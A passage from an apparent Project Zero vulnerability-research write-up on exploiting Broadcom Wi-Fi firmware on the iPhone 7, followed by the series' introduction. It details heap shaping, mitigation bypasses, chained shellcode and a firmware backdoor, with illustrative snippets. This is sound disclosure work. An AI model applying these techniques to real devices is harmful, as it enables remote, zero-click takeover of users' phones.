To do so we’ll need to use a more subtle approach - instead of modifying the free chunk’s contents directly, we’ll aim to achieve a layout in which two free chunks overlap one another, thereby causing allocations carved from one chunk to overwrite the metadata of the other (leading to control over the latter’s “next” pointer).

Heap Shaping
Achieving a predictable heap layout is key for a reliable exploit. As our current goal is to create a specific layout (namely, two overlapping heap chunks), we require setting up the heap in a manner which would allow us to achieve such a layout.
Classically, heap shaping is performed by leveraging primitives allowing for control either over an allocation’s lifetime, or optionally over the allocation’s size. Triggering allocations within the heap without immediately freeing them, allows us to fill “holes” in the heap, leading to a more predictable layout.
The allocator used in the firmware is a “best-fit” allocator which allocates from high addresses to lower ones. Consequently, if all “holes” in the heap of a certain size are filled, subsequent allocations of the same size (or larger) would be carved from the best-fitting chunk, proceeding from top to bottom, thus creating a linear allocation pattern.
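To see why filling the holes leads to a linear pattern, consider the following simplified model of a best-fit allocator that carves from the top of the chosen chunk. It is a sketch, not the firmware's allocator: chunk headers, coalescing and the unlinking of exhausted chunks are all ignored, and the structure and function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified model of one entry in the singly linked freelist. */
struct free_chunk {
    uint32_t addr;               /* address where the free region starts */
    uint32_t size;               /* number of free bytes in the region */
    struct free_chunk *next;     /* next free chunk, or NULL */
};

/* Best fit: the smallest free chunk that is still large enough. */
static struct free_chunk *best_fit(struct free_chunk *head, uint32_t need) {
    struct free_chunk *best = NULL;
    for (struct free_chunk *c = head; c != NULL; c = c->next)
        if (c->size >= need && (best == NULL || c->size < best->size))
            best = c;
    return best;
}

/* Carves `need` bytes from the END (highest address) of the chunk and
 * returns the address of the new allocation. */
static uint32_t carve(struct free_chunk *c, uint32_t need) {
    c->size -= need;
    return c->addr + c->size;
}

/* Returns the address of the allocation, or 0 if nothing fits. */
static uint32_t model_alloc(struct free_chunk *head, uint32_t need) {
    struct free_chunk *c = best_fit(head, need);
    return c != NULL ? carve(c, need) : 0;
}
```

In this model, once no hole can hold a request, every allocation of that size comes from the large chunk, each one placed directly below the previous one. A smaller request still lands in a hole that fits it more tightly.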
To understand the Wi-Fi firmware’s heap layout, let’s take a snapshot of the heap’s state using our Wi-Fi debugger (repeating the process multiple times to account for any variability in the state):

As we can see, several small chunks are strewn across the heap, alongside a single large chunk. From the structure above, we can deduce that in order to create a predictable allocation pattern for our NRREP buffer, we’d simply need a shaping primitive allowing us to fill all the “holes” whose sizes match that of the NRREP buffer.
However, this is easier said than done. As we’ve mentioned before, few allocations occur during routine operations, and those that do are immediately freed thereafter. Combing through all the action frame handlers, we fail to find even a single instance of a memory leak (i.e., an allocation with infinite lifetime), or even an allocation that persists beyond the scope of the handlers themselves. Be that as it may, we do know of one mechanism, governed by action frames, which could offer a solution.
Normally, each Wi-Fi frame received by a station is individually acknowledged by transmitting a corresponding acknowledgement frame in response. However, many use-cases exist in which multiple frames are expected to be sent at the same time; requiring an acknowledgement for each individual frame in those cases would be rather inefficient. Instead, the 802.11n standard (expanding on 802.11e) introduced “Block Acknowledgements” (BA). Under the new scheme, stations may acknowledge multiple frames at once, by transmitting a single BA frame.
To utilise BAs, a corresponding session must first be constructed. This is done by transmitting an ADDBA Request (IEEE 802.11-2016) from the originating peer to the responder, resulting in an ADDBA Response being sent in the opposite direction, acknowledging a successful setup. Similarly, BAs can be torn down by sending a DELBA frame, indicating the BA should no longer be active. Each BA is identified by a unique Traffic Identifier (TID). While the standard specifies up to 16 supported TIDs, the firmware only supports the first 8, restricting the number of BAs possible in firmware to the same limit.

Since the lifetime of BAs is explicitly controlled by the construction of the corresponding BA sessions, they may constitute good heap shaping candidates. Indeed, going over the corresponding action frame handler in the firmware, it appears that every allocated BA results in a 164-byte allocation being made, holding the BA’s contents. The allocation persists until the corresponding DELBA is received, upon which the BA structure corresponding to the given TID is freed.
To use BAs in our network, we’ll add a new command to hostapd, allowing injection of both ADDBA and DELBA requests with crafted TIDs. Furthermore, we’ll take care to compile hostapd with support for 802.11n (CONFIG_IEEE80211N) and to enable it in our network (ieee80211n).
Putting the above together, we arrive at a pretty powerful heap shaping primitive! By sending ADDBA Requests, we can trigger the allocation of up to eight distinct 164-byte allocations. Better yet, we can selectively delete the allocations corresponding to each BA by sending a DELBA frame with the corresponding TID.
Having said that, two immediate downsides also spring to mind. First, the allocation size is fixed, therefore we cannot use the primitive to shape the heap for allocations smaller than 164 bytes. Second, the contents of the BA buffers are not controlled by us (they mostly contain bit-fields used for reordering frames in the BA).
Attempting Overlapping Chunks
Using our shiny new shaping primitive, we can now proceed to shape the heap in a manner allowing the creation of overlapping chunks. To do so, let’s begin by allocating all the BAs, from 0 through 7. The first few allocations will fill in whatever holes can accommodate them within the heap. Subsequently, the rest of the allocations will be carved from the main heap chunk, advancing linearly from high addresses to lower ones.
(Grey blocks indicate free chunks)
Quite conveniently, as the allocation primitive is much larger than the “small buffer” allocated during the NRREP request, it allows the smaller holes in the heap, those large enough to hold the 28-byte allocation, to persist. Consequently, the “small buffer” is simply carved from one of the remaining holes, allowing us to safely ignore it.
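The behaviour described above can be illustrated with a toy best-fit allocator. This is only a sketch: the hole addresses and sizes are made up, chunk headers are ignored, and the real allocator's bookkeeping is certainly more involved. It does, however, reproduce the two properties we rely on: 164-byte allocations first plug any hole that fits and then march downwards through the main chunk, while the 28-byte buffer lands in a leftover small hole.

```python
def best_fit_alloc(holes, size):
    """Carve `size` bytes from the smallest hole that fits.

    `holes` maps a hole's start address to its length. The allocation is
    taken from the high end of the hole, so consecutive allocations from
    one large chunk advance from high addresses to lower ones.
    """
    fitting = [(length, addr) for addr, length in holes.items() if length >= size]
    if not fitting:
        raise MemoryError("no hole large enough")
    length, addr = min(fitting)          # best fit = smallest adequate hole
    del holes[addr]
    if length > size:
        holes[addr] = length - size      # the remainder stays at the low end
    return addr + (length - size)


def shape_demo():
    # Hypothetical heap snapshot: three small holes and one main chunk.
    holes = {0x1000: 32, 0x2000: 200, 0x3000: 40, 0x10000: 4096}
    bas = [best_fit_alloc(holes, 164) for _ in range(8)]   # BA0..BA7
    small = best_fit_alloc(holes, 28)                      # NRREP "small buffer"
    return bas, small
```

In this model the first BA fills the 200-byte hole, the remaining seven are laid out back-to-back in the main chunk, and the 28-byte allocation is served from the 32-byte hole without disturbing the BAs.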
Getting back to the issue at hand - in order to create an overlapping allocation, all we’d need to do is use the vulnerability primitive to increment the size field of one of the BAs. After growing the size by whichever amount we desire, we can proceed to delete the newly expanded BA, along with its neighbouring BAs, causing an overlapping allocation.

Unfortunately, running through the above scenario results in a resounding failure -- the firmware crashes upon any attempt to free a block causing an overlapping allocation…
To get down to the bottom of this odd behaviour, we’ll need to locate the source of the crash. Inspecting the AppleBCMWLANBusInterfacePCIe driver, it appears that whenever a trap is generated by the firmware, the driver simply collects the aforementioned crash data, and outputs it to the device’s syslog. Therefore, to inspect the crash report, we’ll simply dump the syslog using idevicesyslog. After generating a crash we are presented with the following output:
Inspecting the source address of the crash in the firmware’s image, we come across an unfamiliar block of code in the “free” function, which was not present in prior firmware versions. In fact, the entire function seems to have many of these blocks… To understand this new code, let’s dig a little deeper.
New Mitigations
Going over the allocator’s “free” function, we find that in addition to freeing the blocks themselves, the function now performs several additional verifications on the heap’s structure, meant to ensure that it is not corrupted in any way. If any violations are detected, the firmware calls an “abort” function, subsequently causing the firmware to crash.
After reverse-engineering all the above validations, we arrive at the following list of mitigations:
  1. The chunk’s bounds are compared against a pre-populated list of “allowed” regions.
  2. The chunk is compared against all other chunks in the freelist, searching for overlaps.
  3. The chunk is checked against a list of “disallowed” regions.
  4. The chunk is ensured to be 4-byte aligned.

If any violation is detected, the firmware triggers the “abort” function, thereby halting execution.
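As a rough mental model, the four checks can be expressed as a single validation routine. The sketch below is our own simplification: the order of the checks, the exact boundary comparisons and the representation of the region lists are assumptions, not a transcription of the firmware's code.

```python
def check_free(start, size, freelist, allowed, disallowed):
    """Return the name of the violated check, or None if the free is accepted.

    `allowed` and `disallowed` are lists of (low, high) address ranges;
    `freelist` is a list of (start, size) tuples describing free chunks.
    """
    end = start + size
    # 4. The chunk must be 4-byte aligned.
    if start % 4 != 0:
        return "misaligned"
    # 1. The chunk must lie entirely within an "allowed" region.
    if not any(lo <= start and end <= hi for lo, hi in allowed):
        return "outside allowed regions"
    # 3. The chunk must not touch any "disallowed" region.
    if any(end > lo and hi > start for lo, hi in disallowed):
        return "inside disallowed region"
    # 2. The chunk must not overlap any chunk already in the freelist.
    if any(end > f_start and f_start + f_size > start
           for f_start, f_size in freelist):
        return "overlaps free chunk"
    return None
```

In the firmware any non-`None` outcome corresponds to a call to “abort”.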
It appears that Broadcom has done some hardening on the allocator! This is great from a security perspective, but rather bleak news for our exploit, as it appears that any attempt to create an overlapping pair of chunks will result in a crash. Perhaps we’re out of luck…
Bypassing Mitigation #1
...Or are we?
Instead of first increasing a heap block’s size, then freeing it to create overlapping chunks, let’s opt for a different approach. We’ll arrange for the following layout; first, we’ll create two free chunks, which are not immediately adjacent to one another (to prevent the allocator from coalescing them). Then we’ll use the NRREP primitive to slowly increment the size of one block, until it overlaps the other.
However, as the NRREP primitive only allows us to modify data extending up to 60 bytes after the buffer, and each BA buffer is much larger in size (164 bytes), we’ll first need to devise a plan to get our NRREP buffer closer to a free chunk, without it actually impinging on the chunk (and thereby coalescing with it).
We’ll do so by leveraging a little trick. After allocating all the BAs, we’ll proceed to slightly increment the last BA’s size using the vulnerability primitive. Once that chunk is freed, a free chunk is subsequently created in its place, spanning the new expanded size instead of the original allocation’s size. Since the new free chunk extends into neighbouring BAs, the next BA allocation will therefore overlap a previously allocated BA. This allows us to effectively “sink” an allocation into neighbouring blocks, advancing the scope of influence of our NRREP buffer to previously unreachable objects!
As the allocator’s “malloc” function zeroes every chunk upon allocation, following the plan above will lead to BA6’s size being set to zero. However, there’s no need to fret: we can simply increase it using our NRREP primitive (as we’re now within range of BA6).
Next, we’ll increase BA6’s size slightly until it nearly overlaps with BA5. Then, we can free both BAs, and proceed to use the NRREP buffer to increase BA6’s free chunk until it overlaps with BA5’s. It’s important to note that since both “holes” are much smaller than the NRREP buffer, it won’t be placed within them, leaving us to utilise them as we please.

Bypassing Mitigation #2
Having created a pair of overlapping free-chunks, our first instinct is to carve an allocation from the encompassing chunk, thereby overwriting the other chunk’s metadata. To do so, we’ll need to find an allocation primitive allowing for control over its contents.
Recall that we have already searched for (and failed to locate) allocations with a controlled lifetime. Therefore, any allocation primitive we do find would be one with a limited lifespan. But alas, freeing an allocation carved from any of the overlapping chunks will lead us once again to the “free” function’s overlapping chunk mitigation, subsequently halting the firmware (and thwarting our attempt). Let’s take a closer look at the mitigation and see whether we can find a way around it.
Going through the code, it appears to have the following high-level logic:
1.     //Calculating the current chunk’s bounds
2.     uint8_t* start = (uint8_t*)cur + sizeof(uint32_t);
3.     uint8_t* end   = start + (cur->size & 0xFFFFFFFC);
4.     
5.     //Checking for intersection between the current chunk and each free-chunk
6.     for (freechunk_t* p = get_freelist_head(); p != NULL; p = p->next) {
7.         uint8_t* p_start = (uint8_t*)p;
8.         uint8_t* p_end   = p_start + (p->size & 0xFFFFFFFC) + 2 * sizeof(uint32_t);
9.         if (end > p_start && p_end > start)
10.             CRASH();
11.     }
As we can see, the code snippet above lacks checks for integer overflows! Therefore, by storing a sufficiently large size in a free chunk, the calculation of p_end will result in an integer overflow, causing the stored value to wrap around to a low address. Consequently, the expression at line 9 will always evaluate to “false”, allowing us to bypass the mitigation.
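We can convince ourselves of this by modelling the 32-bit pointer arithmetic in Python. The addresses and sizes below are invented for illustration; the only point is that once p_end wraps around to a value below the freed chunk's start, the intersection test can no longer fire.

```python
MASK32 = 0xFFFFFFFF


def overlap_detected(start, end, p_start, p_size):
    """Mirror of the intersection test, using wrapping 32-bit arithmetic."""
    # p_end = p_start + (size & ~3) + two 32-bit header words, truncated
    # to 32 bits just as a pointer would be on the firmware's core.
    p_end = (p_start + (p_size & 0xFFFFFFFC) + 8) & MASK32
    return end > p_start and p_end > start


# Hypothetical chunk being freed, overlapping a free chunk at 0x200140.
freed = (0x200100, 0x200180)

# An honest size is caught by the check...
honest = overlap_detected(*freed, p_start=0x200140, p_size=0x40)

# ...whereas a huge size wraps p_end around to 0x148, far below `start`.
forged = overlap_detected(*freed, p_start=0x200140, p_size=0xFFE00000)
```

Here `honest` is `True` (the firmware would crash) while `forged` is `False`, even though the two chunks still physically overlap.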
Great, so all we need to do is ensure that when overwriting BA5’s free chunk, we also set its size to an exorbitantly large value. Moreover, as we’re dealing with a “best-fit” allocator, such a chunk will never be the best fitting (as smaller chunks will always exist), therefore there’s no need to worry about the allocator using our malformed chunk in the interim.
Creating Overlapping Chunks
To proceed, we’ll need to locate an allocation primitive allowing control over its contents, and preferably also offering a controlled size. Using such a primitive, we’ll be able to create an allocation for which BA6’s free chunk is the best fitting, subsequently overwriting BA5’s free-chunk header.
Going through the action frame handlers once again, we find a near-fit; Spectrum Measurement Requests (SPECMEAS). In short, SPECMEAS frames are action frames belonging to the Spectrum Management category. These requests are used by access points to instruct stations to perform various measurements and report the results back to the network.
Broadcom’s Wi-Fi firmware supports two different types of measurements; a “basic” measurement, and a “Clear Channel Assessment” (CCA) measurement. Upon receiving a SPECMEAS request, the firmware allocates a buffer in order to store the report’s data. For every “CCA” measurement received, 5 bytes are added to the buffer’s size. However, for every “basic” measurement encountered, 17 bytes are added to the buffer, of which many contain attacker-controlled data!
Using this primitive we can therefore trigger allocations of sizes that are linear combinations of 5 and 17. For every 17-byte block corresponding to a “basic” measurement, we can control several of the embedded bytes (namely, those at indices [5,15], 2).
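Picking the right mix of measurements for a desired allocation size is a small exercise in arithmetic. The helper below is a sketch of that calculation; it assumes the buffer size is exactly 5 bytes per “CCA” measurement plus 17 bytes per “basic” measurement, with no additional fixed overhead, which may not hold for the real handler.

```python
def measurement_counts(target, cca_size=5, basic_size=17):
    """List every (cca, basic) pair whose report buffer is `target` bytes.

    Solves cca * cca_size + basic * basic_size == target over the
    non-negative integers.
    """
    solutions = []
    for cca in range(target // cca_size + 1):
        remainder = target - cca * cca_size
        if remainder % basic_size == 0:
            solutions.append((cca, remainder // basic_size))
    return solutions
```

For instance, a 39-byte buffer can only be produced by one “CCA” and two “basic” measurements, whereas an 85-byte buffer can be produced either by five “basic” measurements or by seventeen “CCA” ones. Only the former offers any controlled bytes.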
While not a perfect allocation primitive, it’ll have to do. Since there are more than eight consecutive controlled bytes for each “basic” measurement request, we can use them in order to overwrite BA5’s free chunk header (the 32-bit size and pointer fields). By using a linear combination of the sizes above, we’ll guarantee that the controlled bytes are aligned with BA5’s free chunk header. Lastly, the size of the allocation performed must also be chosen so that BA6’s free chunk is the best fitting (therefore forcing the allocation to be carved from it, rather than other free chunks). Putting it all together, we arrive at the following layout:
Overwrite Candidates
Now that we’re able to commandeer free chunks, we just need to find some overwrite candidates in order to hijack the control flow.
Whereas in the previous firmware versions we researched, in-use chunks contained the same fields as free chunks (namely, 32-bit size and next fields), the current chunks’ formats make them incompatible with free chunks. Therefore, in-use chunks normally do not constitute valid targets to impersonate free chunks.
Nonetheless, it is not entirely impossible that such objects exist. For example, any in-use allocation starting with a 32-bit zero word would be a valid free chunk. Similarly, chunks could begin with 32-bit pointers to other data types, which themselves may constitute a valid chain of free chunks. Even better yet, any data structure in the firmware’s RAM (not only heap chunks) could conceivably masquerade as a free chunk, so long as it follows the above format.
To get to the bottom of this, we’ve written a short script that goes over the firmware’s contents, searching for blocks that match the aforementioned description. Each block we discover constitutes a potential overwrite target by directing our fake free chunk at it. Running the script on a RAM dump of the firmware, we are greeted with the following result:

Great, there appear to be several candidates for overwrite!
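A search of this kind could look roughly like the sketch below. It is not the script we used; it assumes a little-endian RAM dump loaded at a known base address, and it treats the first 32-bit word of each candidate as the “next” pointer, accepting a block if following those pointers reaches a zero word within a few hops. The function name, the `max_depth` bound and the decision to ignore the size field are all simplifications of ours.

```python
import struct


def find_free_chunk_candidates(ram, base, max_depth=4):
    """Return addresses that could pass for the head of a short free-chunk chain."""

    def word_at(addr):
        # Read an aligned 32-bit word, or None if it falls outside the dump.
        offset = addr - base
        if addr % 4 or offset < 0 or offset + 4 > len(ram):
            return None
        return struct.unpack_from("<I", ram, offset)[0]

    hits = []
    for addr in range(base, base + len(ram) - 3, 4):
        cur = addr
        for _ in range(max_depth):
            nxt = word_at(cur)
            if nxt is None:          # pointer leads outside RAM: not a chain
                break
            if nxt == 0:             # chain terminates cleanly
                hits.append(addr)
                break
            cur = nxt
    return hits
```

Bounding the chain length keeps the scan from looping forever on cyclic pointers, at the cost of missing very long chains.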
In our previous exploration of the Wi-Fi firmware, we identified a certain class of objects that made good targets for hijacking control flow -- timers. These structures hold function pointers denoting periodically invoked timer functions. While many such timers exist in the current firmware as well, they are rather hard to overwrite using the above primitive. First, they do not start with a 32-bit zero field (but rather with the magic value “MITA”). Second, each timer is a link in a doubly-linked list, whose contents are constantly manipulated. To overwrite a timer, we’d need to insert a valid element into the list.
Instead, going over the list of candidates above, we come across a structure within the “persist” segment, containing a block of function pointers. Using our firmware debugger, we can indeed verify that several of the function pointers within this structure are periodically invoked. Therefore, by finding a free chunk candidate within this block, we should be able to commandeer one of the aforementioned function pointers, directing it at a location of our choice.

Unfortunately, attempting to do so results in a resounding failure.
Bypassing Mitigation #3
Each attempt to allocate data on top of the aforementioned block of function pointers using SPECMEAS frames immediately causes the firmware to halt. Inspecting the source of the crash leads us back to one of the mitigations we mentioned earlier on; the “disallowed ranges” list.
Apparently, the entire “persist” block is contained in the list of regions within which “free” operations must not occur. Consequently, without bypassing this mitigation, we will not be able to overwrite data within the aforementioned range.
Thinking about this mitigation for a moment, we come up with an interesting proposition: perhaps we could use our commandeered free chunk in order to overwrite the “disallowed ranges” list itself?
While the list’s contents lie within one of the disallowed zones, recall that this validation is only performed by the “free” function, whereas “malloc” will happily carve allocations at any address, without consulting the above list. Therefore, by pointing our free chunk to a location overlapping the “disallowed ranges” list, we can use a SPECMEAS frame to overwrite its contents (thereby nullifying its effect). While SPECMEAS frames are immediately freed after they are allocated, this is no longer a concern, as by the time the “free” occurs, the “disallowed ranges” will have already been overwritten!
Putting It All Together
Using the steps above, we can disable the “disallowed ranges” list, allowing us to subsequently use the commandeered free chunk in order to hijack one of the function pointers in the persist block. Finally, we simply require a means of stashing some shellcode in a predictable location within the firmware’s RAM. By doing so, we will be able to direct the aforementioned function pointer at our shellcode, leading to arbitrary code execution.
Since the addresses within the “persist” block are fixed, they make for prime candidates to store our shellcode. Searching through the block, we come across several potential overwrite candidates, any of which can be hijacked with our “fake” free chunk.
However, there’s one more hurdle to overcome -- the code we’re about to store must not be overwritten at any point. If the code is inadvertently overwritten, the firmware will attempt to execute a corrupted chunk of code, possibly leading it to crash.
To get around this limitation, we’ll use one more action frame: Radio Measurement Requests (RMREQ). These frames are part of the 802.11k RRM standard, and allow for periodic measurements to be performed (and reported) by the firmware. Similarly to SPECMEAS frames, their handler allocates several bytes of data for each measurement IE encoded in the request.
Most importantly, RMREQ frames include a field denoting the number of repetitions that stations should perform when receiving the scan request. Going through the specification reveals that this field also has a “special” value, allowing scans to continue indefinitely:
IEEE 802.11-2016,
By encoding this value in an RMREQ frame, we can guarantee that the corresponding allocated buffer will not be subsequently freed, therefore allowing safe storage of our code.
Lastly, we need to consider the problem of the shellcode’s internal structure. Unlike SPECMEAS frames which allowed us to control multiple bytes in each chunk of the allocated buffer, RMREQ frames only provide control over four consecutive bytes out of every 20 bytes allocated. Luckily, as Thumb is a dense instruction set, it allows us to cram two instructions into each 32-bit controlled word. Therefore, we can break up our shellcode using the following pattern: the first 16-bit word will encode an instruction of our choosing, whereas the second word will contain a relative branch to the next controlled chunk. Formatting our shellcode in this manner allows us to construct arbitrarily large chunks of shellcode:
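The encoding of such a chain is easy to sketch in Python. The snippet below assumes that the four controlled bytes sit at the same offset within each 20-byte record and are 2-byte aligned, and that every payload instruction is a 16-bit Thumb instruction; the helper names are ours. The branch uses the 16-bit unconditional `B` encoding, whose target is the branch's own address plus 4 plus twice the 11-bit immediate.

```python
import struct

STRIDE = 20   # distance between consecutive controlled 32-bit words


def thumb_branch(distance):
    """Encode a 16-bit Thumb `B` that lands `distance` bytes past the branch."""
    delta = distance - 4                 # PC reads as branch address + 4
    if delta % 2 or not -2048 <= delta <= 2046:
        raise ValueError("branch target out of range or misaligned")
    return 0xE000 | ((delta >> 1) & 0x7FF)


def split_shellcode(instructions):
    """Pair each 16-bit instruction with a hop to the next controlled word."""
    # The branch lives 2 bytes into the controlled word, so the next
    # controlled word begins STRIDE - 2 bytes after the branch itself.
    hop = thumb_branch(STRIDE - 2)
    return [struct.pack("<HH", insn, hop) for insn in instructions]


# Example: `movs r0, #1` followed by `bx lr`.
words = split_shellcode([0x2001, 0x4770])
```

With a 20-byte stride the hop always encodes as 0xE007. The hop following the final instruction is never reached if that instruction transfers control elsewhere, as `bx lr` does here.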

Building a Backdoor
Combining all the primitives above, we can finally stash and execute a chunk of shellcode on the Wi-Fi firmware!
To allow for easier exploration of the firmware, it’s worth taking a moment to convert this rudimentary form of access to a more refined toolset. Otherwise, we’d have to resort to encoding all the post-exploitation logic using segmented chunks of shellcode -- not an alluring prospect.
We’ll begin by using the shellcode above to write a small “backdoor” into the firmware, which we’ll call the “initial payload”. This payload constitutes the most minimal backdoor imaginable; it simply intercepts the NRREP handler, and reads two 32-bit words from it, storing the value of one word into the address denoted by the other. The initial payload therefore allows us to perform arbitrary 32-bit writes to the firmware’s RAM, by sending crafted NRREP frames over-the-air.
Next, we’ll use the initial payload in order to write a more sophisticated one, which we’ll refer to as the “secondary payload”. This payload also intercepts the NRREP handler (replacing the previous hook), but allows for a far richer set of commands, namely:
  1. Reading data from the firmware RAM
  2. Writing to the firmware’s RAM
  3. Executing a shellcode stub
  4. Performing a CRC32 calculation on a block of data

The capabilities above allow us to fully control the firmware over-the-air, from the safety of a Python script. Indeed, not unlike our research platform, we’ve implemented the protocols for communicating with the backdoor in Python, allowing for APIs implementing all of the functionality above.
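To give a feel for what such an API might look like, here is a self-contained sketch of a client talking to a simulated backdoor. Everything about the wire format (a one-byte opcode followed by a 32-bit address and a 32-bit length) is hypothetical and chosen for brevity; the real payload's protocol, carried inside NRREP frames, differs, and the shellcode execution command is left out of the simulation.

```python
import struct
import zlib

CMD_READ, CMD_WRITE, CMD_EXEC, CMD_CRC32 = range(4)
HEADER = "<BII"   # hypothetical layout: opcode, address, length


class FakeFirmware:
    """Stand-in for the chip: a flat RAM region answering backdoor commands."""

    def __init__(self, base, size):
        self.base = base
        self.ram = bytearray(size)

    def handle(self, frame):
        op, addr, length = struct.unpack_from(HEADER, frame)
        off = addr - self.base
        if op == CMD_READ:
            return bytes(self.ram[off:off + length])
        if op == CMD_WRITE:
            payload = frame[struct.calcsize(HEADER):][:length]
            self.ram[off:off + length] = payload
            return b""
        if op == CMD_CRC32:
            return struct.pack("<I", zlib.crc32(self.ram[off:off + length]))
        raise ValueError("command not supported by the simulation")


class Backdoor:
    """Client-side API; `send` delivers a frame and returns the reply."""

    def __init__(self, send):
        self.send = send

    def read(self, addr, length):
        return self.send(struct.pack(HEADER, CMD_READ, addr, length))

    def write(self, addr, data):
        self.send(struct.pack(HEADER, CMD_WRITE, addr, len(data)) + data)

    def crc32(self, addr, length):
        reply = self.send(struct.pack(HEADER, CMD_CRC32, addr, length))
        return struct.unpack("<I", reply)[0]
```

Because the client only depends on a `send` callable, the same code can be pointed at a simulation such as `Backdoor(FakeFirmware(0x160000, 0x100).handle)` or at a function that injects real frames. A checksum command of this kind is handy, for example, to confirm that a large write arrived intact without reading it all back.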
In fact, the two are so similar that several of the research framework’s modules can be directly executed using the secondary payload, by simply replacing the memory access APIs in the research framework with those offered by the secondary payload.
The Exploit
Summing up all the work above, we’ve finally written a complete exploit, allowing code execution on the Wi-Fi chip of the iPhone 7. You can find the complete exploit here.
The exploit has been tested against the Wi-Fi firmware present in iOS 10.2 (14C92). The vulnerability is present in versions of iOS up to (and including) iOS 10.3.3. Researchers wishing to utilise the exploit on different iDevices or different versions, would be required to adjust the necessary symbols used by the exploit (see “exploit/”).
Note that the exploit continuously attempts to install the backdoor into the Wi-Fi firmware, until it is successful. For any unsuccessful attempt, the firmware simply silently reboots, allowing the exploit to continue along. Moreover, due to a clever feat of engineering by Apple, rebooting the firmware does not interrupt ongoing connections; instead, they are continued as the chip reboots, allowing for a rather stealthy attack.
Wrapping Up
Over the course of this blog post we performed a deep dive into the Wi-Fi firmware present on the iPhone 7. Our exploration led us to discover new attack surfaces, several added mitigations, and multiple vulnerabilities.
By exploiting one of the aforementioned vulnerabilities, we were able to gain control over the Wi-Fi SoC, allowing us to gain a foothold on the device itself, directly over-the-air. In doing so, we also bypassed several of the firmware’s exploit mitigations, demonstrating how they can be reinforced in future versions.
In the next blog post, we’ll complete our journey towards full control over the target device, by devising a full exploit chain allowing us to leverage our newly acquired control over the Wi-Fi chip in order to launch an attack against iOS itself. Ultimately, we’ll construct an over-the-air exploit allowing complete control over the iOS kernel.

Over The Air - Vol. 2, Pt. 1: Exploiting The Wi-Fi Stack on Apple Devices

Google Project Zero - Thu, 09/28/2017 - 11:21
Posted by Gal Beniamini, Project Zero
Earlier this year we performed research into Broadcom’s Wi-Fi stack. Due to the ubiquity of Broadcom’s stack, we chose to conduct our prior research through the lens of one affected family of products -- the Android ecosystem. To paint a more complete picture of the state of Wi-Fi security in the mobile ecosystem, we’ve chosen to revisit the topic - this time through the lens of Apple devices. In this research we’ll perform a deeper dive into each of the affected components, discover new attack surfaces, and finally construct a full over-the-air exploit chain against iPhones, allowing complete control over the target device.
Since there’s much ground to cover, we’ve chosen to split the research into a three-part blog series. The first blog post will focus on exploring the Wi-Fi stack itself and developing the necessary research tools to explore it on the iPhone. In the second blog post, we’ll perform research into the Wi-Fi firmware, discover multiple vulnerabilities, and develop an exploit allowing attackers to execute arbitrary code on the Wi-Fi chip itself, requiring no user-interaction. Lastly, in the final blog post we’ll explore the iPhone’s host isolation mechanisms, research the ways in which the Wi-Fi chip interacts with the host, and develop a fully-fledged exploit allowing attackers to gain complete control over the iOS kernel over-the-air, requiring no user interaction.
As we’ve mentioned before, Broadcom’s chips are present in a wide variety of devices - ranging from mobile phones to laptops (such as Chromebooks) and even Wi-Fi routers. While we’ve chosen to focus our attention on the Apple ecosystem this time around, it’s worth mentioning that the Wi-Fi firmware vulnerabilities presented in this research affect other devices as well. Additionally, as this research deals with a different attack surface in the Wi-Fi firmware, the breadth of affected devices might be wider than that of our prior research.
More concretely, the Wi-Fi vulnerabilities presented in this research affect many devices in the Android ecosystem. For example, two of the vulnerabilities (#1, #2) affect most of Samsung’s flagship devices, including the Galaxy S8, Galaxy S7 Edge and Galaxy S7. Of the two, one vulnerability is also known to affect Google devices such as the Nexus 6P, and some models of Chromebooks. As for Apple’s ecosystem, while this research deals primarily with iPhones, other devices including Apple TV and iWatch are similarly affected by our findings. The exact breadth of other affected devices has not been investigated further, but is assumed to be wider.
We’d also like to note that until hardware host isolation mechanisms are implemented across the Android ecosystem, every exploitable Wi-Fi firmware vulnerability directly results in complete host takeover. In our previous research we identified the lack of host isolation mechanisms on two of the most prominent SoC platforms; Qualcomm’s Snapdragon 810 and Samsung’s Exynos 8890. We are not aware of any advances in this regard, as of yet.
For the purpose of this research, we’ll demonstrate remote code execution on the iPhone 7 (the most recent iDevice at the time of this research), running iOS 10.2 (14C92). The vulnerabilities presented in this research are present in iOS up to (and including) version 10.3.3 (apart from #1, which was fixed in 10.3.3). Researchers wishing to port the provided research tools and exploits to other versions of iOS or to other iDevices would be required to adjust the referenced symbols.
Over the course of the blog post, we’ll begin fleshing out a memory research platform for iOS. Throughout this blog post series, we’ll rely on the framework extensively, to both analyse and explore components on the system, including the XNU kernel, hardware components, and the Wi-Fi chipset itself. In the next few days, we intend to release the framework publicly. Once the code is made public, we will include links to the corresponding modules to this blog post.
The vulnerabilities affecting Apple devices have been addressed in iOS 11. Similarly, those affecting Android have been addressed in the September bulletin. Note that within the Android ecosystem, OEMs bear the responsibility for providing their own Wi-Fi firmware images (partially due to their high level of customisation). Therefore the corresponding fixes should appear in the vendors’ own bulletins, rather than Android’s security bulletin.
Creating a Research Platform
Before we can begin exploring, we’ll need to lay down the groundwork first. Ideally, we’d like to create our own debugger -- allowing us to both inspect and instrument the Wi-Fi firmware, thereby making exploration (and subsequent exploit development) much easier.
During our previous research into Broadcom’s Wi-Fi chip within the context of the Android ecosystem, this task turned out to be much more straight-forward than expected. Instead of having to create an entire research environment from scratch, we relied on several properties provided by the Android ecosystem to speed up the development phase.
For starters, many Android devices allow developers to intentionally bypass their security model, using “rooted” builds (such as userdebug). Flashing such a build onto a device allows us to freely explore and interact with many components on the system. As the security model is only bypassed explicitly, the odds of side-effects resulting from our research affecting the system’s behaviour are rather slim.
Additionally, Broadcom provides their own debugging tools to the Android ecosystem, consisting of a command-line utility and a dedicated set of ioctls within Broadcom’s device driver, bcmdhd. These tools allow sufficiently privileged users to interact with the Wi-Fi chip in a variety of ways, including the ability to access the chip’s RAM directly -- an essential primitive when constructing a debugger. Basing our own toolset on this platform allowed us to create a rather comfortable research environment.
Furthermore, Android utilises the Linux Kernel, which is licensed under GPLv2. Therefore, the kernel’s source code, including that of the device drivers, is freely available. Reading through Broadcom’s device driver (bcmdhd) turned out to be an invaluable resource -- sparing us some unnecessary reverse-engineering while also allowing us to easily assess the ways in which the chip and host interact with one another.
Lastly, some of the data sheets pertaining to the Wi-Fi SoCs used on Android devices were made publicly available by Cypress following their acquisition of Broadcom’s IoT business. While most of the information in the data sheets is irrelevant to our research, we were able to gather a handful of useful clues regarding the architecture of the SoC itself.

Unfortunately, it appears we have no such luck this time around!
